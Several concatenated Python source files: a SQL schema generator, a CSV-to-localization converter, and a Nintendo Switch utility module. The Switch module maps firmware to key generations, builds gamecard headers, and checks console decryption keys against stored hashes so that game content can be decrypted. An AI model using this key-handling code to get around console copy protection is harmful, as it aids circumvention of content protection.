'TIMESTAMP': 'TEXT',
'VARCHAR': 'TEXT',
'DATE': 'TEXT'}
filename = pathlib.Path(sys.argv[1])
table_name = filename.stem.rsplit('_', 1)[0]
print('CREATE table {} ('.format(table_name))
field_defs = []
has_rpt_id = False
with open(filename) as f:
next(f)
next(f)
for line in f:
name = line[:55].strip().lower()
nullable = line[55:64].strip()
field_type = field_type_mapping[line[64:].strip()]
definition = '{} {} {}'.format(name, field_type, nullable)
if name == 'oid':
definition += ' PRIMARY KEY'
elif table_name == 'lm_data' and name == 'rpt_id':
definition += ' PRIMARY KEY'
if name == 'rpt_id':
has_rpt_id = True
field_defs.append(definition)
if table_name != 'lm_data' and has_rpt_id:
field_defs += ['FOREIGN KEY(rpt_id) REFERENCES lm_data(rpt_id)']
print(', '.join(field_defs))
print(');')
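# Example invocation (illustrative; the script and layout file names are
# placeholders, not from the original project).  The table name is the file
# stem minus its trailing "_<suffix>", so "lm_data_layout.txt" yields the
# table "lm_data":
#
#   python make_ddl.py lm_data_layout.txt > lm_data.sql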
|
the-stack_106_15942
|
import csv
import os
import re
def translate(file, path):
csv_file = open(file, 'r')
csv_reader = csv.reader(csv_file, delimiter=',')
locales = [
{'identifier' : 'fr', 'column' : 3},
{'identifier' : 'en', 'column' : 5}
]
for aLocale in locales:
if not os.path.exists(path+aLocale['identifier']+'.lproj'):
os.makedirs(path+aLocale['identifier']+'.lproj')
file = open(path+aLocale['identifier']+'.lproj/Localizable.strings','w')
        csv_file.seek(0)  # rewind so each locale iterates over every CSV row
        for row in csv_reader:
#Sample Code - You should override it
key = row[1]
value = row[aLocale['column']]
file.write("\""+key+"\"=\""+escape(value)+"\";\n")
file.close()
def escape(str):
return str.replace("\"","\\\"").replace("\\\\n","\\n")
def is_valid_android_key(str):
"""
    In an Android xml file, the key must follow some requirements:
    - the key should not contain uppercase letters
    - the key should not begin with a number
    - the only special character accepted is _
    You can edit the regexp as required
"""
prog = re.compile("([a-z]+)(([a-z]*)(_)*([0-9])*)*")
result = prog.match(str)
return result
def escape_android(str):
"""
    This function escapes common symbols when going from iOS to Android (e.g. %@ -> %s).
    You can add your own rules.
"""
tmp = str.replace("\"", "\\\"")\
.replace("\\\\n", "\\n")\
.replace("'", "\\'")\
.replace("%@", "%s")\
.replace("&", "&")
if "<" in str or ">" in str:
return "<![CDATA["+tmp+"]]>"
else:
return tmp
def translate_android(file, path):
"""
    This function parses the file located at {file} and exports the translations into files under {path}
"""
#Provide here mapping between your CSV columns and the desired output file
#The key is never write into the output file, use it for clarity
#The file value is the name of the folder which will be generated by the program
#The column value should be an integer which represent the column of the desired local in the CSV file
#
locales = {
'en': {'file': 'values/', 'column': 2},
'fr': {'file': 'values-fr/', 'column': 3},
'ja': {'file': 'values-ja/', 'column': 5},
'zh': {'file': 'values-zh/', 'column': 4}
}
#iterate over all locales to generate the translation file
for aLocal in locales.keys():
csv_file = open(file, 'r')
csv_reader = csv.reader(csv_file, delimiter=',')
_path = path+'/'+locales[aLocal]['file']
if not os.path.exists(path):
os.makedirs(path)
if not os.path.exists(_path):
os.makedirs(_path)
file_pointer = open(_path+'strings.xml', 'w')
#Add default text to xml file
file_pointer.write('<?xml version="1.0" encoding="utf-8"?>\n')
file_pointer.write('<resources>\n')
i = 0
for row in csv_reader:
#You have to implement your own parser rules here.
key = row[1]
value = row[locales[aLocal]['column']]
value = escape_android(value)
#Check if the key is valid for android usage. See is_valid_android_key documentation for more infos
if not is_valid_android_key(key):
print("Invalid android key provided :"+key)
else:
file_pointer.write(" <string name=\"" + key + "\">" + value +
"</string>\n")
file_pointer.write('</resources>\n')
file_pointer.close()
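# Illustrative usage sketch (the CSV name and output folders are assumptions,
# not part of the original script): feed one spreadsheet export to both
# generators to produce iOS .strings files and Android strings.xml files.
if __name__ == "__main__":
    translate("translations.csv", "ios/")
    translate_android("translations.csv", "android/res")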
|
the-stack_106_15943
|
import random
import os, codecs
import Hex
from binascii import hexlify as hx, unhexlify as uhx
import Keys
import re
from hashlib import sha256
from struct import pack as pk, unpack as upk
import Fs
import aes128
import sq_tools
import io
import Print
indent = 1
tabs = '\t' * indent
'''
versions =
0: "1.0.0", -> keygeneration = 0
450: "1.0.0", -> keygeneration = 0
65536: "2.0.0", -> keygeneration = 1
131072: "2.1.0", -> keygeneration = 1
196608: "2.2.0", -> keygeneration = 1
262144: "2.3.0", -> keygeneration = 1
201326592: "3.0.0", -> keygeneration = 2
201392128: "3.0.1", -> keygeneration = 3
201457664: "3.0.2", -> keygeneration = 3
268435456: "4.0.0", -> keygeneration = 4
268500992: "4.0.1", -> keygeneration = 4
269484032: "4.1.0", -> keygeneration = 4
335544320: "5.0.0", -> keygeneration = 5
335609856: "5.0.1", -> keygeneration = 5
335675392: "5.0.2", -> keygeneration = 5
336592896: "5.1.0", -> keygeneration = 5
402653184: "6.0.0", -> keygeneration = 6
402718720: "6.0.1", -> keygeneration = 6
403701760: "6.1.0", -> keygeneration = 6
404750336: "6.2.0" -> keygeneration = 7
469762048: "7.0.0" -> keygeneration = 8
469827584: "7.0.1" -> keygeneration = 8
536870912: "8.0.0" -> keygeneration = 8
536936448: "8.0.1" -> keygeneration = 8
537919488: "8.1.0" -> keygeneration = 9
603979776: "9.0.0" -> keygeneration = 10
604045312: "9.0.1" -> keygeneration = 10
605028352: "9.1.0" -> keygeneration = 11
606076928: "9.2.0" -> keygeneration = 11
671088640: "10.0.0" -> keygeneration = 11
671154176: "10.0.1" -> keygeneration = 11
671219712: "10.0.2" -> keygeneration = 11
671285248: "10.0.3" -> keygeneration = 11
671350784: "10.0.4" -> keygeneration = 11
672137216: "10.1.0" -> keygeneration = 11
672202752: "10.1.1" -> keygeneration = 11
673185792: "10.2.0" -> keygeneration = 11
'''
def kgstring():
kg=list()
kg11=[605028352,606076928,671088640,671154176,671219712,671285248,671350784,672137216,672202752,673185792];kg.append(kg11)
kg10=[603979776,604045312];kg.append(kg10)
kg9=[537919488];kg.append(kg9)
kg8=[536936448,536870912,469827584,469762048];kg.append(kg8)
kg7=[404750336];kg.append(kg7)
kg6=[403701760,402718720,402653184];kg.append(kg6)
kg5=[336592896,335675392,335609856,335544320];kg.append(kg5)
kg4=[269484032,268500992,268435456];kg.append(kg4)
kg3=[201457664,201392128];kg.append(kg3)
kg2=[201326592];kg.append(kg2)
kg1=[262144,196608,131072,65536];kg.append(kg1)
kg0=[450,0];kg.append(kg0)
return kg
def kg_by_RSV(RSV):
kgs=kgstring();keygen=len(kgs);topkg=len(kgs)
for k in range(len(kgs)):
if RSV in kgs[k]:
keygen-=1
if keygen<0:
return 'unknown'
return keygen
def transform_fw_string(FW):
FW=FW.split('-');rem=0;RRSV=0
if len(FW)>1:
rem=FW[1]
else:
rem=0
FW=FW[0]
FW=FW.split('.')
RSV=0
for i in range(len(FW)):
n=int(FW[i])
if i==0:
if n>=3:
RSV+=67108864*n
elif n==2:
RSV+=65536
elif i==1 and int(FW[0])>3:
RSV+=1048576*n
elif i==1 and int(FW[0])==2:
RSV+=1*n
elif i==2 and int(FW[0])>3:
RSV+=65536*n
RRSV=RSV+rem
return RSV,RRSV
def kg2masterkey(kg):
if kg == 1:
return 1
else:
return kg-1
def getTopRSV(keygeneration, RSV):
if keygeneration == 0:
return 450
if keygeneration == 1:
return 262164
if keygeneration == 2:
return 201327002
if keygeneration == 3:
return 201457684
if keygeneration == 4:
return 269484082
if keygeneration == 5:
return 336592976
if keygeneration == 6:
return 403701850
if keygeneration == 7:
return 404750376
if keygeneration == 8:
return 536936448
if keygeneration == 9:
return 537919488
if keygeneration == 10:
return 603979776
if keygeneration == 11:
return 673185792
else:
return RSV
def getMinRSV(keygeneration, RSV):
if keygeneration == 0:
return 0
if keygeneration == 1:
return 65796
if keygeneration == 2:
RSV=3*67108864
return RSV
if keygeneration == 3:
RSV=3*67108864+1*65536
return RSV
if keygeneration == 4:
RSV=4*67108864
return RSV
if keygeneration == 5:
RSV=5*67108864
return RSV
if keygeneration == 6:
RSV=6*67108864
return RSV
if keygeneration == 7:
RSV=6*67108864+2*1048576
return RSV
if keygeneration == 8:
RSV=7*67108864
return RSV
if keygeneration == 9:
RSV=8*67108864+1*1048576
return RSV
if keygeneration == 10:
RSV=9*67108864
return RSV
if keygeneration == 11:
RSV=9*67108864+2*1048576+0*65796+0*1
return RSV
else:
return RSV
def getFWRangeKG(keygeneration):
if keygeneration == 0:
return "(1.0.0)"
if keygeneration == 1:
return "(2.0.0 - 2.3.0)"
if keygeneration == 2:
return "(3.0.0)"
if keygeneration == 3:
return "(3.0.1 - 3.0.2)"
if keygeneration == 4:
return "(4.0.0 - 4.1.0)"
if keygeneration == 5:
return "(5.0.0 - 5.1.0)"
if keygeneration == 6:
return "(6.0.0 - 6.1.0)"
if keygeneration == 7:
return "(6.2.0)"
if keygeneration == 8:
return "(7.0.0 - 8.0.1)"
if keygeneration == 9:
return "(8.1.0)"
if keygeneration == 10:
return "(9.0.0 - 9.0.1)"
if keygeneration == 11:
return "(9.1.0 - >10.2.0)"
else:
return "UNKNOWN"
def getmetacontenttype(ncatypenumber):
ncatypenumber=int(ncatypenumber)
if ncatypenumber==0:
return "Meta"
elif ncatypenumber==1:
return "Program"
elif ncatypenumber==2:
return "Data"
elif ncatypenumber==3:
return "Control"
elif ncatypenumber==4:
return "HtmlDocument"
elif ncatypenumber==5:
return "LegalInformation"
elif ncatypenumber==6:
return "DeltaFragment"
def getFWRangeRSV(RSV):
if RSV >= (3*67108864):
RSV=int(RSV)
frst_num=str(int(RSV/67108864))
remainder=RSV%67108864
sec_num=str(int(remainder/1048576))
remainder=remainder%1048576
thd_num=str(int(remainder/65536))
remainder=remainder%65536
fth_num=remainder
version=str(frst_num)
version+='.'
version+=str(sec_num)
version+='.'
version+=str(thd_num)
if fth_num > 0:
version+='-'
version+=str(fth_num)
version="("+version+")"
return version
elif RSV >= 65536:
RSV=int(RSV)
frst_num=2
sec_num=str(int(RSV/65536))
remainder=RSV%65536
thd_num=0
fth_num=remainder
version=str(frst_num)
version+='.'
version+=str(sec_num)
version+='.'
version+=str(thd_num)
if fth_num > 0:
version+='-'
version+=str(fth_num)
version="("+version+")"
return version
elif RSV > 0:
RSV=int(RSV)
frst_num=1
sec_num=0
thd_num=0
remainder=RSV%65536
fth_num=remainder
version=str(frst_num)
version+='.'
version+=str(sec_num)
version+='.'
version+=str(thd_num)
if fth_num > 0:
version+='-'
version+=str(fth_num)
version="("+version+")"
return version
elif RSV == 0:
return "(1.0.0)"
else:
return "(-)"
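# Minimal sketch (illustrative, not part of the original module): pretty-print
# the firmware range covered by a key generation and decode an RSV integer back
# into a firmware version string.  The sample values are assumptions.
if __name__ == "__main__":
    print(getFWRangeKG(8))            # "(7.0.0 - 8.0.1)"
    print(getFWRangeRSV(671088640))   # RSV for firmware 10.0.0 -> "(10.0.0)"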
def getSize(bytes):
if bytes>(1024*1024*1024):
Gbytes=bytes/(1024*1024*1024)
Gbytes=round(Gbytes,2)
Gbytes=str(Gbytes)+"GB"
return Gbytes
if bytes>(1024*1024):
Mbytes=bytes/(1024*1024)
Mbytes=round(Mbytes,2)
Mbytes=str(Mbytes)+"MB"
return Mbytes
if bytes>(1024):
Kbytes=bytes/(1024)
Kbytes=round(Kbytes,2)
Kbytes=str(Kbytes)+"KB"
return Kbytes
else:
bytes=str(bytes)+"B"
return bytes
def getGCsize(bytes):
Gbytes=bytes/(1024*1024*1024)
Gbytes=round(Gbytes,2)
if Gbytes>=32:
card=0xE3
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=16:
card=0xE2
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=8:
card=0xE1
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=4:
card=0xE0
firm_ver='1000a100'
return card,firm_ver
if Gbytes>=2:
card=0xF0
firm_ver='1100a100'
return card,firm_ver
if Gbytes>=1:
card=0xF8
firm_ver='1100a100'
return card,firm_ver
if Gbytes<1:
card=0xFA
firm_ver='1100a100'
return card,firm_ver
def getGCsizeinbytes(GCflag):
bytes=''
if GCflag=='E3':
size=64
if GCflag=='E2':
size=32
if GCflag=='E1':
size=16
if GCflag=='E0':
size=8
if GCflag=='F0':
size=4
if GCflag=='F8':
size=2
if GCflag=='FA':
size=1
bytes=size*998244352
return bytes
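# Minimal sketch (illustrative, not part of the original module): pick the
# gamecard flag for a ~14 GiB image and report the byte size that flag maps
# back to.  The byte count is an assumption for demonstration.
if __name__ == "__main__":
    card, firm_ver = getGCsize(14 * 1024 ** 3)
    print(hex(card), firm_ver, getGCsizeinbytes('{:X}'.format(card)))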
def getTypeFromCNMT(number):
if number == 0:
return "Meta: "
if number == 1:
return "Program: "
if number == 2:
return "Data: "
if number == 3:
return "Control: "
if number == 4:
return "HtmlDoc: "
if number == 5:
return "LegalInf: "
if number == 6:
return "Delta: "
def randhex(size):
hexdigits = "0123456789ABCDEF"
random_digits = "".join([ hexdigits[random.randint(0,0xF)] for _ in range(size*2) ])
return random_digits
def get_enc_gameinfo(bytes):
Gbytes=bytes/(1024*1024*1024)
Gbytes=round(Gbytes,2)
if Gbytes>=32 or Gbytes>=16 or Gbytes>=8 or Gbytes>=4:
firm_ver= 0x9298F35088F09F7D
access_freq= 0xa89a60d4
Read_Wait_Time= 0xcba6f96f
Read_Wait_Time2= 0xa45bb6ac
Write_Wait_Time= 0xabc751f9
Write_Wait_Time2= 0x5d398742
Firmware_Mode = 0x6b38c3f2
CUP_Version = 0x10da0b70
Empty1 = 0x0e5ece29
Upd_Hash= 0xa13cbe1da6d052cb
CUP_Id = 0xf2087ce9af590538
Empty2= 0x570d78b9cdd27fbeb4a0ac2adff9ba77754dd6675ac76223506b3bdabcb2e212fa465111ab7d51afc8b5b2b21c4b3f40654598620282add6
else:
firm_ver= 0x9109FF82971EE993
access_freq=0x5011ca06
Read_Wait_Time=0x3f3c4d87
Read_Wait_Time2=0xa13d28a9
Write_Wait_Time=0x928d74f1
Write_Wait_Time2=0x49919eb7
Firmware_Mode =0x82e1f0cf
CUP_Version = 0xe4a5a3bd
Empty1 = 0xf978295c
Upd_Hash= 0xd52639a4991bdb1f
CUP_Id = 0xed841779a3f85d23
Empty2= 0xaa4242135616f5187c03cf0d97e5d218fdb245381fd1cf8dfb796fbeda4bf7f7d6b128ce89bc9eaa8552d42f597c5db866c67bb0dd8eea11
firm_ver=firm_ver.to_bytes(8, byteorder='big')
access_freq=access_freq.to_bytes(4, byteorder='big')
Read_Wait_Time=Read_Wait_Time.to_bytes(4, byteorder='big')
Read_Wait_Time2=Read_Wait_Time2.to_bytes(4, byteorder='big')
Write_Wait_Time=Write_Wait_Time.to_bytes(4, byteorder='big')
Write_Wait_Time2=Write_Wait_Time2.to_bytes(4, byteorder='big')
Firmware_Mode=Firmware_Mode.to_bytes(4, byteorder='big')
CUP_Version=CUP_Version.to_bytes(4, byteorder='big')
Empty1=Empty1.to_bytes(4, byteorder='big')
Upd_Hash=Upd_Hash.to_bytes(8, byteorder='big')
CUP_Id=CUP_Id.to_bytes(8, byteorder='big')
Empty2=Empty2.to_bytes(56, byteorder='big')
Game_info = b''
Game_info += firm_ver
Game_info += access_freq
Game_info += Read_Wait_Time
Game_info += Read_Wait_Time2
Game_info += Write_Wait_Time
Game_info += Write_Wait_Time2
Game_info += Firmware_Mode
Game_info += CUP_Version
Game_info += Empty1
Game_info += Upd_Hash
Game_info += CUP_Id
Game_info += Empty2
#print(Game_info)
return Game_info
def get_krypto_block(keygeneration):
if keygeneration == 0:
return 'f3cbc0052cac528adf9129210f0a02e4'
if keygeneration == 1:
return 'f3cbc0052cac528adf9129210f0a02e4'
if keygeneration == 2:
return '789800b9e78b860eec2f7862ef05545e'
if keygeneration == 3:
return '99776e03a21f56232d056b8683d9c681'
if keygeneration == 4:
return '48df2c73957fa1b73b8e33fb2d052512'
if keygeneration == 5:
return '91dea3589a56e4fa1ce60a444009e7d8'
if keygeneration == 6:
return 'cd5b0d1abcf6450f37b8a3b68a15d5e9'
if keygeneration == 7:
return 'e7ae8f7303809fd63cbd1f500b31d5b9'
else:
return "UNKNOWN"
def verify_nkeys(fileName):
indent = 1
tabs = ' ' * indent
checkkeys = {}
with open(fileName, encoding="utf8") as f:
for line in f.readlines():
r = re.match('\s*([a-z0-9_]+)\s*=\s*([A-F0-9]+)\s*', line, re.I)
if r:
checkkeys[r.group(1)] = r.group(2)
print("")
if 'aes_kek_generation_source' not in checkkeys:
print("aes_kek_generation_source is Missing")
if 'aes_key_generation_source' not in checkkeys:
print("aes_key_generation_source is Missing")
if 'titlekek_source' not in checkkeys:
print("titlekek_source is Missing")
if 'key_area_key_application_source' not in checkkeys:
print("key_area_key_application_source is Missing")
if 'key_area_key_ocean_source' not in checkkeys:
print("key_area_key_ocean_source is Missing")
if 'key_area_key_system_source' not in checkkeys:
print("key_area_key_system_source is Missing")
counter=0
if 'master_key_00' not in checkkeys:
print("master_key_00 is Missing")
else:
counter+=1
if 'master_key_01' not in checkkeys:
print("master_key_01 is Missing")
else:
counter+=1
if 'master_key_02' not in checkkeys:
print("master_key_02 is Missing")
else:
counter+=1
if 'master_key_03' not in checkkeys:
print("master_key_03 is Missing")
else:
counter+=1
if 'master_key_04' not in checkkeys:
print("master_key_04 is Missing")
else:
counter+=1
if 'master_key_05' not in checkkeys:
print("master_key_05 is Missing")
else:
counter+=1
if 'master_key_06' not in checkkeys:
print("master_key_06 is Missing")
else:
counter+=1
if 'master_key_07' not in checkkeys:
print("master_key_07 is Missing")
else:
counter+=1
if 'master_key_08' not in checkkeys:
print("master_key_08 is Missing")
else:
counter+=1
if 'master_key_09' not in checkkeys:
print("master_key_09 is Missing")
else:
counter+=1
if 'master_key_10' not in checkkeys and 'master_key_0a' not in checkkeys:
print("master_key_10|master_key_0a is Missing")
else:
counter+=1
if 'header_key' not in checkkeys:
print("header_key is Missing")
if 'xci_header_key' not in checkkeys:
print('OPTIONAL KEY "xci_header_key" is Missing')
while counter<len(checkkeys):
if len(str(counter))<2:
mkverifier='master_key_0'+str(counter)
else:
			mkverifier='master_key_'+str(counter)
if mkverifier in checkkeys:
print(mkverifier+" is present but program doesn't have the hash to verify the key")
for i in checkkeys:
if i==mkverifier:
mk =checkkeys[i][:]
sha=sha256(uhx(mk)).hexdigest()
print(' > HEX SHA256: '+sha)
print('')
counter+=1
for i in checkkeys:
if i == 'aes_kek_generation_source':
aes_kek_generation_source =checkkeys[i][:]
print('aes_kek_generation_source : '+aes_kek_generation_source )
sha=sha256(uhx(aes_kek_generation_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'fc02b9d37b42d7a1452e71444f1f700311d1132e301a83b16062e72a78175085':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'aes_key_generation_source':
aes_key_generation_source =checkkeys[i][:]
print('aes_key_generation_source : '+aes_key_generation_source )
sha=sha256(uhx(aes_key_generation_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'fbd10056999edc7acdb96098e47e2c3606230270d23281e671f0f389fc5bc585':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'titlekek_source':
titlekek_source=checkkeys[i][:]
print('titlekek_source: '+titlekek_source)
sha=sha256(uhx(titlekek_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'c48b619827986c7f4e3081d59db2b460c84312650e9a8e6b458e53e8cbca4e87':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'key_area_key_application_source':
key_area_key_application_source=checkkeys[i][:]
print('key_area_key_application_source: '+key_area_key_application_source)
sha=sha256(uhx(key_area_key_application_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '04ad66143c726b2a139fb6b21128b46f56c553b2b3887110304298d8d0092d9e':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'key_area_key_ocean_source':
key_area_key_ocean_source=checkkeys[i][:]
print('key_area_key_ocean_source: '+key_area_key_ocean_source)
sha=sha256(uhx(key_area_key_ocean_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'fd434000c8ff2b26f8e9a9d2d2c12f6be5773cbb9dc86300e1bd99f8ea33a417':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'key_area_key_system_source':
key_area_key_system_source=checkkeys[i][:]
print('key_area_key_system_source: '+key_area_key_system_source)
sha=sha256(uhx(key_area_key_system_source)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '1f17b1fd51ad1c2379b58f152ca4912ec2106441e51722f38700d5937a1162f7':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_00':
master_key_00=checkkeys[i][:]
print('master_key_00: '+master_key_00)
sha=sha256(uhx(master_key_00)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '0ee359be3c864bb0782e1d70a718a0342c551eed28c369754f9c4f691becf7ca':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_01':
master_key_01=checkkeys[i][:]
print('master_key_01: '+master_key_01)
sha=sha256(uhx(master_key_01)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4fe707b7e4abdaf727c894aaf13b1351bfe2ac90d875f73b2e20fa94b9cc661e':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_02':
master_key_02=checkkeys[i][:]
print('master_key_02: '+master_key_02)
sha=sha256(uhx(master_key_02)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '79277c0237a2252ec3dfac1f7c359c2b3d121e9db15bb9ab4c2b4408d2f3ae09':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_03':
master_key_03=checkkeys[i][:]
print('master_key_03: '+master_key_03)
sha=sha256(uhx(master_key_03)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4f36c565d13325f65ee134073c6a578ffcb0008e02d69400836844eab7432754':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_04':
master_key_04=checkkeys[i][:]
print('master_key_04: '+master_key_04)
sha=sha256(uhx(master_key_04)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '75ff1d95d26113550ee6fcc20acb58e97edeb3a2ff52543ed5aec63bdcc3da50':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_05':
master_key_05=checkkeys[i][:]
print('master_key_05: '+master_key_05)
sha=sha256(uhx(master_key_05)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == 'ebe2bcd6704673ec0f88a187bb2ad9f1cc82b718c389425941bdc194dc46b0dd':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_06':
master_key_06=checkkeys[i][:]
print('master_key_06: '+master_key_06)
sha=sha256(uhx(master_key_06)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '9497e6779f5d840f2bba1de4e95ba1d6f21efc94717d5ae5ca37d7ec5bd37a19':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_07':
master_key_07=checkkeys[i][:]
print('master_key_07: '+master_key_07)
sha=sha256(uhx(master_key_07)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4ec96b8cb01b8dce382149443430b2b6ebcb2983348afa04a25e53609dabedf6':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_08':
master_key_08=checkkeys[i][:]
print('master_key_08: '+master_key_08)
sha=sha256(uhx(master_key_08)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '2998e2e23609bc2675ff062a2d64af5b1b78dff463b24119d64a1b64f01b2d51':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_09':
master_key_09=checkkeys[i][:]
print('master_key_09: '+master_key_09)
sha=sha256(uhx(master_key_09)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '9d486a98067c44b37cf173d3bf577891eb6081ff6b4a166347d9dbbf7025076b':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'master_key_10' or i == 'master_key_0a':
master_key_10=checkkeys[i][:]
print('master_key_10|master_key_0a: '+master_key_10)
sha=sha256(uhx(master_key_10)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '4ec5a237a75a083a9c5f6cf615601522a7f822d06bd4ba32612c9cebbb29bd45':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'header_key':
header_key=checkkeys[i][:]
print('header_key: '+header_key)
sha=sha256(uhx(header_key)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '8e03de24818d96ce4f2a09b43af979e679974f7570713a61eed8b314864a11d5':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
if i == 'xci_header_key':
xci_header_key=checkkeys[i][:]
print('xci_header_key: '+xci_header_key)
sha=sha256(uhx(xci_header_key)).hexdigest()
print(' > HEX SHA256: '+sha)
if sha == '2e36cc55157a351090a73e7ae77cf581f69b0b6e48fb066c984879a6ed7d2e96':
print(tabs+'> Key is valid!!!')
else:
print(tabs+'> Key is invalid!!! -> PLEASE CHECK YOUR KEYS.TXT!!!')
print('')
def verify_nkeys_startup(fileName):
indent = 1
tabs = ' ' * indent
checkkeys = {}
startup=False
with open(fileName, encoding="utf8") as f:
for line in f.readlines():
			r = re.match(r'\s*([a-z0-9_]+)\s*=\s*([A-F0-9]+)\s*', line, re.I)
if r:
checkkeys[r.group(1)] = r.group(2)
print("")
if 'aes_kek_generation_source' not in checkkeys:
print("aes_kek_generation_source is Missing")
print("This is a needed key!!!")
startup=True
if 'aes_key_generation_source' not in checkkeys:
print("aes_key_generation_source is Missing")
print("This is a needed key!!!")
startup=True
if 'titlekek_source' not in checkkeys:
print("titlekek_source is Missing")
print("This is a needed key!!!")
startup=True
if 'key_area_key_application_source' not in checkkeys:
print("key_area_key_application_source is Missing")
print("This is a needed key!!!")
startup=True
if 'key_area_key_ocean_source' not in checkkeys:
print("key_area_key_ocean_source is Missing")
print("This is a needed key!!!")
startup=True
if 'key_area_key_system_source' not in checkkeys:
print("key_area_key_system_source is Missing")
print("This is a needed key!!!")
startup=True
counter=0
if 'master_key_00' not in checkkeys:
print("master_key_00 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 1.0.0-2.3.0 requirement")
startup=True
else:
counter+=1
if 'master_key_01' not in checkkeys:
print("master_key_01 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 3.0.0 requirement")
startup=True
else:
counter+=1
if 'master_key_02' not in checkkeys:
print("master_key_02 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 3.0.1-3.0.2 requirement")
startup=True
else:
counter+=1
if 'master_key_03' not in checkkeys:
print("master_key_03 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 4.0.0-4.0.1 requirement")
startup=True
else:
counter+=1
if 'master_key_04' not in checkkeys:
print("master_key_04 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 5.0.0-5.1.0 requirement")
startup=True
else:
counter+=1
if 'master_key_05' not in checkkeys:
print("master_key_05 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 6.0.0-6.1.0 requirement")
startup=True
else:
counter+=1
if 'master_key_06' not in checkkeys:
print("master_key_06 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 6.2.0 requirement")
startup=True
else:
counter+=1
if 'master_key_07' not in checkkeys:
print("master_key_07 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 7.0.0-8.0.1 requirement")
startup=True
else:
counter+=1
if 'master_key_08' not in checkkeys:
print("master_key_08 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 8.1 requirement")
startup=True
else:
counter+=1
if 'master_key_09' not in checkkeys:
print("master_key_09 is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 9.0 requirement")
startup=True
else:
counter+=1
if 'master_key_10' not in checkkeys and 'master_key_0a' not in checkkeys:
print("master_key_10|master_key_0a is Missing!!!")
print("The program won't be able to decrypt games content that uses this key")
print("This key represents FW 9.1-10.04 requirement")
startup=True
else:
counter+=1
if 'header_key' not in checkkeys:
print("header_key is Missing")
if 'xci_header_key' not in checkkeys:
print('OPTIONAL KEY "xci_header_key" is Missing')
while counter<len(checkkeys):
if len(str(counter))<2:
